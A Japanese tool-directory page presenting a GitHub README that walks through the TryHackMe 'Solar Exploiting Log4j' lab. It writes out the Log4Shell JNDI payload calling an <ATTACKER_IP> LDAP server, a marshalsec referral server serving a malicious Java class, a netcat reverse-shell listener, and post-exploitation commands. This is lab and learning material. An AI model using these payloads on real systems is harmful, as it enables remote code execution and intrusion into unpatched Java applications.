Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
solar-exploiting-log4j — このリポジトリは、TryHackMe の *Solar Exploiting Log4j room* の詳細なウォークスルーを提供し、重大な Log4Shell 脆弱性(CVE-2021-44228)の悪用に焦点を当てています。このプロジェクトは、攻撃者が Java アプリケーションの安全でないログ記録メカニズムを悪用してリモートコード実行を達成する方法を示しています。 | Kitploit
ツール/GitHubGitHub/lavanya2085/solar-exploiting-log4j
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

このリポジトリは、TryHackMe の *Solar Exploiting Log4j room* の詳細なウォークスルーを提供し、重大な Log4Shell 脆弱性(CVE-2021-44228)の悪用に焦点を当てています。このプロジェクトは、攻撃者が Java アプリケーションの安全でないログ記録メカニズムを悪用してリモートコード実行を達成する方法を示しています。

リポジトリを見る
5ヶ月前未レビュー

🔥 Solar Exploiting Log4j - TryHackMe ウォークスルー

📌 ルーム: Solar Exploiting Log4j

プラットフォーム: TryHackMe 難易度: 中級 トピック: Log4Shell(Log4jの脆弱性)


🧠 目的

Log4jの脆弱性(CVE-2021-44228)を悪用してリモートコード実行を獲得し、フラグを取得します。


🛠️ 使用ツール

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 ステップ 1: 偵察

🔍 ターゲットのスキャン

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 調査結果

  • 開放ポート: 80(HTTP)、その他はルームによって異なる
  • Javaベースのバックエンドで動作するWebアプリケーション

🌐 ステップ 2: Web列挙

  • ブラウザでWebアプリにアクセスする
  • 入力項目(ログイン/検索/ヘッダーフィールド)を操作する
  • Burp Suiteでリクエストをキャプチャする

💥 ステップ 3: Log4jの脆弱性の特定

Log4jの脆弱性により、JNDIインジェクションが可能になります:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

入力がログに記録される場合 → 脆弱性が存在します。


⚙️ ステップ 4: リスナーのセットアップ

Netcatの起動

root@kitploit:~
nc -lvnp 4444

悪意のあるLDAPサーバーの起動(例)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAPサーバーを実行:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 ステップ 5: ペイロードのホスト

root@kitploit:~
python3 -m http.server 8000

悪意のあるJavaクラス(Exploit.class)を作成します


🚀 ステップ 6: エクスプロイトのトリガー

脆弱なフィールドにペイロードを注入します:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 次のようなヘッダーを使用します:

  • User-Agent
  • X-Api-Version

🖥️ ステップ 7: リバースシェルの獲得

トリガー後:

  • ターゲットがNetcatリスナーに接続し返す
  • シェルアクセスが得られる

🔐 ステップ 8: 権限昇格(必要な場合)

確認:

root@kitploit:~
sudo -l

探すもの:

  • 設定ミスのあるSUIDバイナリ
  • 書き込み可能なファイル
  • Cronジョブ

🚩 ステップ 9: フラグの取得

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 学んだ主要な概念

  • Log4Shell (CVE-2021-44228)
  • JNDIインジェクション
  • リモートコード実行(RCE)
  • リバースシェル
  • Webエクスプロイテーション

ツールをダウンロード